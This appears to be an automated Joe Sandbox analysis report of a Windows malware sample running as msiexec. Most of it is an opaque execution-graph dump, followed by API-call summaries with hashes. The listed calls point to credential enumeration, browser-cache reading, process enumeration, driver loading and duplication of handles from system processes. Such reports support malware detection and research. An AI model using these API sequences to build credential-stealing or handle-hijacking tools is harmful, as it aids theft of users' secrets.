38004->38006 38005->38004 38007 40d134 16 API calls 38005->38007 38008 40ec2e ??2@YAPAXI 38006->38008 38011 40ec65 38006->38011 38007->38005 38008->38011 38023 40ea7f 38011->38023 38012 402f49 38012->37798 38014 40e8f2 38013->38014 38015 40e8eb ??3@YAXPAX 38013->38015 38016 40e900 38014->38016 38017 40e8f9 ??3@YAXPAX 38014->38017 38015->38014 38018 40e90a ??3@YAXPAX 38016->38018 38020 40e911 38016->38020 38017->38016 38018->38020 38019 40e931 ??2@YAPAXI ??2@YAPAXI 38019->38003 38020->38019 38021 40e921 ??3@YAXPAX 38020->38021 38022 40e92a ??3@YAXPAX 38020->38022 38021->38022 38022->38019 38024 40aa04 free 38023->38024 38025 40ea88 38024->38025 38026 40aa04 free 38025->38026 38027 40ea90 38026->38027 38028 40aa04 free 38027->38028 38029 40ea98 38028->38029 38030 40aa04 free 38029->38030 38031 40eaa0 38030->38031 38032 40a9ce 4 API calls 38031->38032 38033 40eab3 38032->38033 38034 40a9ce 4 API calls 38033->38034 38035 40eabd 38034->38035 38036 40a9ce 4 API calls 
[Execution graph residue: a node/edge dump from the report's interactive call-graph viewer (numeric node ids, function addresses and "N API calls" counts), not readable as text. Windows APIs that remain recoverable from the node labels in this span include: CredEnumerateW; FindFirstUrlCacheEntryW / FindNextUrlCacheEntryW / FindCloseUrlCache; CreateToolhelp32Snapshot / Process32FirstW / Process32NextW / OpenProcess / K32GetModuleFileNameExW / GetProcessTimes; RegEnumValueW / RegQueryValueExW; GetPrivateProfileStringW / WritePrivateProfileStringW; FindFirstFileW / FindNextFileW / GetFileAttributesW; GetTempPathW / GetTempFileNameW / CreateFileW / CreateFileMappingW / MapViewOfFile / WriteFile / DuplicateHandle; GetModuleHandleW / GetProcAddress / FreeLibrary / FindResourceW / LoadResource; GetWindowPlacement / SetWindowPlacement; WideCharToMultiByte / MultiByteToWideChar; SystemTimeToFileTime / FileTimeToLocalFileTime; LocalFree / CloseHandle. The graph continues beyond this section.]
??3@YAXPAX 39503->39504 39504->39497 39506 40b633 free 39505->39506 39507 40cf14 39506->39507 39533 40b1ab free free 39507->39533 39509 40bbdd 39509->39449 39509->39454 39510 40cf1b 39510->39509 39512 40cfef 39510->39512 39534 40cd4b 39510->39534 39513 40cd4b 14 API calls 39512->39513 39513->39509 39515 40b633 free 39514->39515 39516 40cc15 39515->39516 39517 40aa04 free 39516->39517 39518 40cc1d 39517->39518 39583 40b1ab free free 39518->39583 39520 40b7d4 memset CreateFileW 39520->38661 39520->38662 39521->39457 39522->39459 39523->39467 39524->39470 39525->39495 39526->39501 39528 40ab93 39527->39528 39529 40ab6b 39527->39529 39528->39503 39530 40a9ce 4 API calls 39529->39530 39531 40ab74 39530->39531 39532 40ab7c MultiByteToWideChar 39531->39532 39532->39528 39533->39510 39535 40cd7b 39534->39535 39568 40aa29 39535->39568 39537 40cef5 39538 40aa04 free 39537->39538 39539 40cefd 39538->39539 39539->39510 39541 40aa29 6 API calls 39542 40ce1d 39541->39542 39543 40aa29 6 API calls 39542->39543 39544 40ce3e 39543->39544 39545 40ce6a 39544->39545 39576 40abb7 wcslen memmove 39544->39576 39546 40ce9f 39545->39546 39579 40abb7 wcslen memmove 39545->39579 39549 40a8d0 7 API calls 39546->39549 39552 40ceb5 39549->39552 39550 40ce56 39577 40aa71 wcslen 39550->39577 39551 40ce8b 39580 40aa71 wcslen 39551->39580 39558 40a8d0 7 API calls 39552->39558 39555 40ce5e 39578 40abb7 wcslen memmove 39555->39578 39556 40ce93 39581 40abb7 wcslen memmove 39556->39581 39560 40cecb 39558->39560 39582 40d00b malloc memcpy free free 39560->39582 39562 40cedd 39563 40aa04 free 39562->39563 39564 40cee5 39563->39564 39565 40aa04 free 39564->39565 39566 40ceed 39565->39566 39567 40aa04 free 39566->39567 39567->39537 39569 40aa33 39568->39569 39575 40aa63 39568->39575 39570 40aa44 39569->39570 39571 40aa38 wcslen 39569->39571 39572 40a9ce malloc memcpy free free 39570->39572 39571->39570 39573 40aa4d 39572->39573 39574 40aa51 memcpy 39573->39574 39573->39575 39574->39575 39575->39537 
39575->39541 39576->39550 39577->39555 39578->39545 39579->39551 39580->39556 39581->39546 39582->39562 39583->39520 39584->38719 39585->38727 39586 44dea5 39587 44deb5 FreeLibrary 39586->39587 39588 44dec3 39586->39588 39587->39588 39589 4147f3 39592 414561 39589->39592 39591 414813 39593 41456d 39592->39593 39594 41457f GetPrivateProfileIntW 39592->39594 39597 4143f1 memset _itow WritePrivateProfileStringW 39593->39597 39594->39591 39596 41457a 39596->39591 39597->39596 39598 4287c1 39599 4287d2 39598->39599 39600 429ac1 39598->39600 39601 428818 39599->39601 39602 42881f 39599->39602 39623 425711 39599->39623 39612 425ad6 39600->39612 39668 415c56 11 API calls 39600->39668 39635 42013a 39601->39635 39663 420244 96 API calls 39602->39663 39607 4260dd 39662 424251 119 API calls 39607->39662 39608 4259da 39661 416760 11 API calls 39608->39661 39613 429a4d 39616 429a66 39613->39616 39620 429a9b 39613->39620 39664 415c56 11 API calls 39616->39664 39617 422aeb memset memcpy memcpy 39617->39623 39621 429a96 39620->39621 39666 416760 11 API calls 39620->39666 39667 424251 119 API calls 39621->39667 39622 4260a1 39660 415c56 11 API calls 39622->39660 39623->39600 39623->39608 39623->39613 39623->39617 39623->39622 39631 4259c2 39623->39631 39634 425a38 39623->39634 39651 4227f0 memset memcpy 39623->39651 39652 422b84 15 API calls 39623->39652 39653 422b5d memset memcpy memcpy 39623->39653 39654 422640 13 API calls 39623->39654 39656 4241fc 11 API calls 39623->39656 39657 42413a 89 API calls 39623->39657 39624 429a7a 39665 416760 11 API calls 39624->39665 39631->39612 39655 415c56 11 API calls 39631->39655 39634->39631 39658 422640 13 API calls 39634->39658 39659 4226e0 12 API calls 39634->39659 39636 42014c 39635->39636 39639 420151 39635->39639 39678 41e466 96 API calls 39636->39678 39638 420162 39638->39623 39639->39638 39640 4201b3 39639->39640 39641 420229 39639->39641 39642 4201b8 39640->39642 39643 4201dc 39640->39643 39641->39638 39644 41fd5e 85 API calls 
39641->39644 39669 41fbdb 39642->39669 39643->39638 39648 4201ff 39643->39648 39675 41fc4c 39643->39675 39644->39638 39648->39638 39650 42013a 96 API calls 39648->39650 39650->39638 39651->39623 39652->39623 39653->39623 39654->39623 39655->39608 39656->39623 39657->39623 39658->39634 39659->39634 39660->39608 39661->39607 39662->39612 39663->39623 39664->39624 39665->39621 39666->39621 39667->39600 39668->39608 39670 41fbf8 39669->39670 39673 41fbf1 39669->39673 39683 41ee26 39670->39683 39674 41fc39 39673->39674 39693 4446ce 11 API calls 39673->39693 39674->39638 39679 41fd5e 39674->39679 39676 41ee6b 85 API calls 39675->39676 39677 41fc5d 39676->39677 39677->39643 39678->39639 39681 41fd65 39679->39681 39680 41fdab 39680->39638 39681->39680 39682 41fbdb 85 API calls 39681->39682 39682->39681 39684 41ee41 39683->39684 39685 41ee32 39683->39685 39694 41edad 39684->39694 39697 4446ce 11 API calls 39685->39697 39688 41ee3c 39688->39673 39691 41ee58 39691->39688 39699 41ee6b 39691->39699 39693->39674 39703 41be52 39694->39703 39697->39688 39698 41eb85 11 API calls 39698->39691 39700 41ee70 39699->39700 39701 41ee78 39699->39701 39756 41bf99 85 API calls 39700->39756 39701->39688 39704 41be6f 39703->39704 39705 41be5f 39703->39705 39711 41be8c 39704->39711 39735 418c63 memset memset 39704->39735 39734 4446ce 11 API calls 39705->39734 39707 41be69 39707->39688 39707->39698 39709 41bee7 39709->39707 39739 41a453 85 API calls 39709->39739 39711->39707 39711->39709 39712 41bf3a 39711->39712 39713 41bed1 39711->39713 39738 4446ce 11 API calls 39712->39738 39715 41bef0 39713->39715 39718 41bee2 39713->39718 39715->39709 39716 41bf01 39715->39716 39717 41bf24 memset 39716->39717 39720 41bf14 39716->39720 39736 418a6d memset memcpy memset 39716->39736 39717->39707 39724 41ac13 39718->39724 39737 41a223 memset memcpy memset 39720->39737 39723 41bf20 39723->39717 39725 41ac52 39724->39725 39726 41ac3f memset 39724->39726 39729 41ac6a 39725->39729 39740 41dc14 19 API calls 
39725->39740 39727 41acd9 39726->39727 39727->39709 39731 41aca1 39729->39731 39741 41519d 39729->39741 39731->39727 39732 41acc0 memset 39731->39732 39733 41accd memcpy 39731->39733 39732->39727 39733->39727 39734->39707 39735->39711 39736->39720 39737->39723 39738->39709 39740->39729 39744 4175ed 39741->39744 39752 417570 SetFilePointer 39744->39752 39747 41760a ReadFile 39748 417637 39747->39748 39749 417627 GetLastError 39747->39749 39750 4151b3 39748->39750 39751 41763e memset 39748->39751 39749->39750 39750->39731 39751->39750 39753 4175b2 39752->39753 39754 41759c GetLastError 39752->39754 39753->39747 39753->39750 39754->39753 39755 4175a8 GetLastError 39754->39755 39755->39753 39756->39701 39757 417bc5 39759 417c61 39757->39759 39763 417bda 39757->39763 39758 417bf6 UnmapViewOfFile CloseHandle 39758->39758 39758->39763 39761 417c2c 39761->39763 39769 41851e 18 API calls 39761->39769 39763->39758 39763->39759 39763->39761 39764 4175b7 39763->39764 39765 4175d6 CloseHandle 39764->39765 39766 4175c8 39765->39766 39767 4175df 39765->39767 39766->39767 39768 4175ce Sleep 39766->39768 39767->39763 39768->39765 39769->39761 39770 415304 free 39771 4152c6 malloc 39772 4152e2 39771->39772 39773 4152ef 39771->39773 39775 416760 11 API calls 39773->39775 39775->39772 39776 4148b6 FindResourceW 39777 4148cf SizeofResource 39776->39777 39780 4148f9 39776->39780 39778 4148e0 LoadResource 39777->39778 39777->39780 39779 4148ee LockResource 39778->39779 39778->39780 39779->39780 39781 441b3f 39791 43a9f6 39781->39791 39783 441b61 39964 4386af memset 39783->39964 39785 44189a 39786 442bd4 39785->39786 39788 4418e2 39785->39788 39787 4418ea 39786->39787 39966 441409 memset 39786->39966 39788->39787 39965 4414a9 12 API calls 39788->39965 39792 43aa20 39791->39792 39793 43aadf 39791->39793 39792->39793 39794 43aa34 memset 39792->39794 39793->39783 39795 43aa56 39794->39795 39796 43aa4d 39794->39796 39967 43a6e7 39795->39967 39975 42c02e memset 39796->39975 39801 43aad3 39977 
4169a7 11 API calls 39801->39977 39802 43aaae 39802->39793 39802->39801 39817 43aae5 39802->39817 39803 43ac18 39806 43ac47 39803->39806 39979 42bbd5 memcpy memcpy memcpy memset memcpy 39803->39979 39807 43aca8 39806->39807 39980 438eed 16 API calls 39806->39980 39811 43acd5 39807->39811 39982 4233ae 11 API calls 39807->39982 39810 43ac87 39981 4233c5 16 API calls 39810->39981 39983 423426 11 API calls 39811->39983 39815 43ace1 39984 439811 162 API calls 39815->39984 39816 43a9f6 160 API calls 39816->39817 39817->39793 39817->39803 39817->39816 39978 439bbb 22 API calls 39817->39978 39819 43acfd 39824 43ad2c 39819->39824 39985 438eed 16 API calls 39819->39985 39821 43ad19 39986 4233c5 16 API calls 39821->39986 39823 43ad58 39987 44081d 162 API calls 39823->39987 39824->39823 39827 43add9 39824->39827 39991 423426 11 API calls 39827->39991 39828 43ae3a memset 39829 43ae73 39828->39829 39992 42e1c0 146 API calls 39829->39992 39830 43adab 39989 438c4e 162 API calls 39830->39989 39831 43ad6c 39831->39793 39831->39830 39988 42370b memset memcpy memset 39831->39988 39835 43adcc 39990 440f84 12 API calls 39835->39990 39836 43ae96 39993 42e1c0 146 API calls 39836->39993 39839 43aea8 39840 43aec1 39839->39840 39994 42e199 146 API calls 39839->39994 39841 43af00 39840->39841 39995 42e1c0 146 API calls 39840->39995 39841->39793 39845 43af1a 39841->39845 39846 43b3d9 39841->39846 39996 438eed 16 API calls 39845->39996 39852 43b4c8 39846->39852 39853 43b3f6 39846->39853 39847 43b60f 39847->39793 40055 4393a5 17 API calls 39847->40055 39850 43af2f 39997 4233c5 16 API calls 39850->39997 39856 43b4f2 39852->39856 40043 42bbd5 memcpy memcpy memcpy memset memcpy 39852->40043 40037 432878 12 API calls 39853->40037 39854 43af51 39998 423426 11 API calls 39854->39998 40044 43a76c 21 API calls 39856->40044 39858 43af7d 39999 423426 11 API calls 39858->39999 39862 43b529 40045 44081d 162 API calls 39862->40045 39863 43b462 40039 423330 11 API calls 39863->40039 39864 43af94 40000 423330 
11 API calls 39864->40000 39868 43afca 40001 423330 11 API calls 39868->40001 39869 43b47e 39873 43b497 39869->39873 40040 42374a memcpy memset memcpy memcpy memcpy 39869->40040 39870 43b544 39874 43b55c 39870->39874 40046 42c02e memset 39870->40046 39871 43b428 39871->39863 40038 432b60 16 API calls 39871->40038 40041 4233ae 11 API calls 39873->40041 40047 43a87a 162 API calls 39874->40047 39876 43afdb 40002 4233ae 11 API calls 39876->40002 39881 43b56c 39885 43b58a 39881->39885 40048 423330 11 API calls 39881->40048 39882 43b4b1 40042 423399 11 API calls 39882->40042 39884 43afee 40003 44081d 162 API calls 39884->40003 40049 440f84 12 API calls 39885->40049 39886 43b4c1 40051 42db80 162 API calls 39886->40051 39891 43b592 40050 43a82f 16 API calls 39891->40050 39894 43b5b4 40052 438c4e 162 API calls 39894->40052 39896 43b5cf 40053 42c02e memset 39896->40053 39898 43b005 39898->39793 39902 43b01f 39898->39902 40004 42d836 162 API calls 39898->40004 39899 43b1ef 40014 4233c5 16 API calls 39899->40014 39902->39899 40012 423330 11 API calls 39902->40012 40013 42d71d 162 API calls 39902->40013 39903 43b212 40015 423330 11 API calls 39903->40015 39905 43b087 40005 4233ae 11 API calls 39905->40005 39906 43add4 39906->39847 40054 438f86 16 API calls 39906->40054 39909 43b22a 40016 42ccb5 11 API calls 39909->40016 39912 43b23f 40017 4233ae 11 API calls 39912->40017 39913 43b10f 40008 423330 11 API calls 39913->40008 39915 43b257 40018 4233ae 11 API calls 39915->40018 39919 43b129 40009 4233ae 11 API calls 39919->40009 39920 43b26e 40019 4233ae 11 API calls 39920->40019 39923 43b09a 39923->39913 40006 42cc15 19 API calls 39923->40006 40007 4233ae 11 API calls 39923->40007 39924 43b282 40020 43a87a 162 API calls 39924->40020 39926 43b13c 40010 440f84 12 API calls 39926->40010 39928 43b29d 40021 423330 11 API calls 39928->40021 39931 43b15f 40011 4233ae 11 API calls 39931->40011 39932 43b2af 39933 43b2b8 39932->39933 39934 43b2ce 39932->39934 40022 4233ae 11 API calls 
39933->40022 40023 440f84 12 API calls 39934->40023 39938 43b2c9 40025 4233ae 11 API calls 39938->40025 39939 43b2da 40024 42370b memset memcpy memset 39939->40024 39942 43b2f9 40026 423330 11 API calls 39942->40026 39944 43b30b 40027 423330 11 API calls 39944->40027 39946 43b325 40028 423399 11 API calls 39946->40028 39948 43b332 40029 4233ae 11 API calls 39948->40029 39950 43b354 40030 423399 11 API calls 39950->40030 39952 43b364 40031 43a82f 16 API calls 39952->40031 39954 43b370 40032 42db80 162 API calls 39954->40032 39956 43b380 40033 438c4e 162 API calls 39956->40033 39958 43b39e 40034 423399 11 API calls 39958->40034 39960 43b3ae 40035 43a76c 21 API calls 39960->40035 39962 43b3c3 40036 423399 11 API calls 39962->40036 39964->39785 39965->39787 39966->39786 39968 43a6f5 39967->39968 39974 43a765 39967->39974 39968->39974 40056 42a115 39968->40056 39972 43a73d 39973 42a115 146 API calls 39972->39973 39972->39974 39973->39974 39974->39793 39976 4397fd memset 39974->39976 39975->39795 39976->39802 39977->39793 39978->39817 39979->39806 39980->39810 39981->39807 39982->39811 39983->39815 39984->39819 39985->39821 39986->39824 39987->39831 39988->39830 39989->39835 39990->39906 39991->39828 39992->39836 39993->39839 39994->39840 39995->39840 39996->39850 39997->39854 39998->39858 39999->39864 40000->39868 40001->39876 40002->39884 40003->39898 40004->39905 40005->39923 40006->39923 40007->39923 40008->39919 40009->39926 40010->39931 40011->39902 40012->39902 40013->39902 40014->39903 40015->39909 40016->39912 40017->39915 40018->39920 40019->39924 40020->39928 40021->39932 40022->39938 40023->39939 40024->39938 40025->39942 40026->39944 40027->39946 40028->39948 40029->39950 40030->39952 40031->39954 40032->39956 40033->39958 40034->39960 40035->39962 40036->39906 40037->39871 40038->39863 40039->39869 40040->39873 40041->39882 40042->39886 40043->39856 40044->39862 40045->39870 40046->39874 40047->39881 40048->39885 40049->39891 40050->39886 40051->39894 
40052->39896 40053->39906 40054->39847 40055->39793 40057 42a175 40056->40057 40059 42a122 40056->40059 40057->39974 40062 42b13b 146 API calls 40057->40062 40059->40057 40060 42a115 146 API calls 40059->40060 40063 43a174 40059->40063 40087 42a0a8 146 API calls 40059->40087 40060->40059 40062->39972 40075 43a196 40063->40075 40078 43a19e 40063->40078 40064 43a306 40064->40075 40107 4388c4 14 API calls 40064->40107 40067 42a115 146 API calls 40067->40078 40069 43a642 40069->40075 40111 4169a7 11 API calls 40069->40111 40073 43a635 40110 42c02e memset 40073->40110 40075->40059 40078->40064 40078->40067 40078->40075 40088 42ff8c 40078->40088 40096 415a91 40078->40096 40100 4165ff 40078->40100 40103 439504 13 API calls 40078->40103 40104 4312d0 146 API calls 40078->40104 40105 42be4c memcpy memcpy memcpy memset memcpy 40078->40105 40106 43a121 11 API calls 40078->40106 40080 43a325 40080->40069 40080->40073 40080->40075 40081 4169a7 11 API calls 40080->40081 40082 42b5b5 memset memcpy 40080->40082 40083 42bf4c 14 API calls 40080->40083 40085 4165ff 11 API calls 40080->40085 40108 42b63e 14 API calls 40080->40108 40109 42bfcf memcpy 40080->40109 40081->40080 40082->40080 40083->40080 40085->40080 40087->40059 40112 43817e 40088->40112 40090 42ff9d 40090->40078 40091 42ff99 40091->40090 40092 42ffe3 40091->40092 40093 42ffd0 40091->40093 40117 4169a7 11 API calls 40092->40117 40116 4169a7 11 API calls 40093->40116 40097 415a9d 40096->40097 40098 415ab3 40097->40098 40099 415aa4 memset 40097->40099 40098->40078 40099->40098 40268 4165a0 40100->40268 40103->40078 40104->40078 40105->40078 40106->40078 40107->40080 40108->40080 40109->40080 40110->40069 40111->40075 40113 438187 40112->40113 40114 438192 40112->40114 40118 4380f6 40113->40118 40114->40091 40116->40090 40117->40090 40120 43811f 40118->40120 40119 438164 40119->40114 40120->40119 40123 437e5e 40120->40123 40146 4300e8 memset memset memcpy 40120->40146 40147 437d3c 40123->40147 40125 437eb3 40125->40120 40126 
437ea9 40126->40125 40132 437f22 40126->40132 40162 41f432 40126->40162 40129 437f06 40209 415c56 11 API calls 40129->40209 40130 437f7f 40133 437f95 40130->40133 40135 43802b 40130->40135 40132->40130 40134 432d4e 3 API calls 40132->40134 40210 415c56 11 API calls 40133->40210 40134->40130 40137 4165ff 11 API calls 40135->40137 40138 438054 40137->40138 40173 437371 40138->40173 40141 43806b 40142 438094 40141->40142 40211 42f50e 137 API calls 40141->40211 40144 437fa3 40142->40144 40212 4300e8 memset memset memcpy 40142->40212 40144->40125 40213 41f638 103 API calls 40144->40213 40146->40120 40148 437d69 40147->40148 40151 437d80 40147->40151 40214 437ccb 11 API calls 40148->40214 40150 437d76 40150->40126 40151->40150 40152 437da3 40151->40152 40153 437d90 40151->40153 40155 438460 133 API calls 40152->40155 40153->40150 40218 437ccb 11 API calls 40153->40218 40158 437dcb 40155->40158 40156 437de8 40217 424f26 122 API calls 40156->40217 40158->40156 40215 444283 13 API calls 40158->40215 40160 437dfc 40216 437ccb 11 API calls 40160->40216 40163 41f54d 40162->40163 40169 41f44f 40162->40169 40164 41f466 40163->40164 40248 41c635 memset memset 40163->40248 40164->40129 40164->40132 40169->40164 40171 41f50b 40169->40171 40219 41f1a5 40169->40219 40244 41c06f memcmp 40169->40244 40245 41f3b1 89 API calls 40169->40245 40246 41f398 85 API calls 40169->40246 40171->40163 40171->40164 40247 41c295 85 API calls 40171->40247 40249 41703f 40173->40249 40175 437399 40176 43739d 40175->40176 40179 4373ac 40175->40179 40256 4446ea 11 API calls 40176->40256 40178 4373a7 40178->40141 40180 416935 16 API calls 40179->40180 40181 4373ca 40180->40181 40183 438460 133 API calls 40181->40183 40187 4251c4 136 API calls 40181->40187 40191 415a91 memset 40181->40191 40194 43758f 40181->40194 40203 437584 40181->40203 40208 437d3c 134 API calls 40181->40208 40257 425433 13 API calls 40181->40257 40258 425413 17 API calls 40181->40258 40259 42533e 16 API calls 40181->40259 40260 42538f 
16 API calls 40181->40260 40261 42453e 122 API calls 40181->40261 40182 4375bc 40264 415c7d 16 API calls 40182->40264 40183->40181 40186 4375d2 40186->40178 40265 4442e6 11 API calls 40186->40265 40187->40181 40189 4375e2 40189->40178 40266 444283 13 API calls 40189->40266 40191->40181 40262 42453e 122 API calls 40194->40262 40195 4375f4 40200 437620 40195->40200 40201 43760b 40195->40201 40199 43759f 40202 416935 16 API calls 40199->40202 40205 416935 16 API calls 40200->40205 40267 444283 13 API calls 40201->40267 40202->40203 40203->40182 40263 42453e 122 API calls 40203->40263 40205->40178 40207 437612 memcpy 40207->40178 40208->40181 40209->40125 40210->40144 40211->40142 40212->40144 40213->40125 40214->40150 40215->40160 40216->40156 40217->40150 40218->40150 40220 41bc3b 100 API calls 40219->40220 40221 41f1b4 40220->40221 40222 41edad 85 API calls 40221->40222 40229 41f282 40221->40229 40223 41f1cb 40222->40223 40224 41f1f5 memcmp 40223->40224 40225 41f20e 40223->40225 40223->40229 40224->40225 40226 41f21b memcmp 40225->40226 40225->40229 40227 41f326 40226->40227 40230 41f23d 40226->40230 40228 41ee6b 85 API calls 40227->40228 40227->40229 40228->40229 40229->40169 40230->40227 40231 41f28e memcmp 40230->40231 40233 41c8df 55 API calls 40230->40233 40231->40227 40232 41f2a9 40231->40232 40232->40227 40235 41f308 40232->40235 40236 41f2d8 40232->40236 40234 41f269 40233->40234 40234->40227 40237 41f287 40234->40237 40238 41f27a 40234->40238 40235->40227 40242 4446ce 11 API calls 40235->40242 40239 41ee6b 85 API calls 40236->40239 40237->40231 40241 41ee6b 85 API calls 40238->40241 40240 41f2e0 40239->40240 40243 41b1ca memset 40240->40243 40241->40229 40242->40227 40243->40229 40244->40169 40245->40169 40246->40169 40247->40163 40248->40164 40250 417044 40249->40250 40251 41705c 40249->40251 40253 416760 11 API calls 40250->40253 40255 417055 40250->40255 40252 417075 40251->40252 40254 41707a 11 API calls 40251->40254 40252->40175 40253->40255 
40254->40250 40255->40175 40256->40178 40257->40181 40258->40181 40259->40181 40260->40181 40261->40181 40262->40199 40263->40182 40264->40186 40265->40189 40266->40195 40267->40207 40273 415cfe 40268->40273 40277 415d23 __aullrem __aulldvrm 40273->40277 40280 41628e 40273->40280 40274 4163ca 40287 416422 11 API calls 40274->40287 40276 416172 memset 40276->40277 40277->40274 40277->40276 40278 416422 10 API calls 40277->40278 40279 415cb9 10 API calls 40277->40279 40277->40280 40278->40277 40279->40277 40281 416520 40280->40281 40282 416527 40281->40282 40286 416574 40281->40286 40284 416544 40282->40284 40282->40286 40288 4156aa 11 API calls 40282->40288 40285 416561 memcpy 40284->40285 40284->40286 40285->40286 40286->40078 40287->40280 40288->40284 40289 441819 40292 430737 40289->40292 40291 441825 40293 430756 40292->40293 40294 43076d 40292->40294 40295 430774 40293->40295 40296 43075f 40293->40296 40294->40291 40307 43034a memcpy 40295->40307 40306 4169a7 11 API calls 40296->40306 40299 4307ce 40300 430819 memset 40299->40300 40308 415b2c 11 API calls 40299->40308 40300->40294 40302 4307e9 40302->40294 40302->40300 40303 43077e 40303->40294 40303->40299 40304 4307fa 40303->40304 40309 4169a7 11 API calls 40304->40309 40306->40294 40307->40303 40308->40302 40309->40294 40310 41493c EnumResourceNamesW

Control-flow Graph

• Executed
• Not Executed
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                        • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
• Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
• Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
APIs
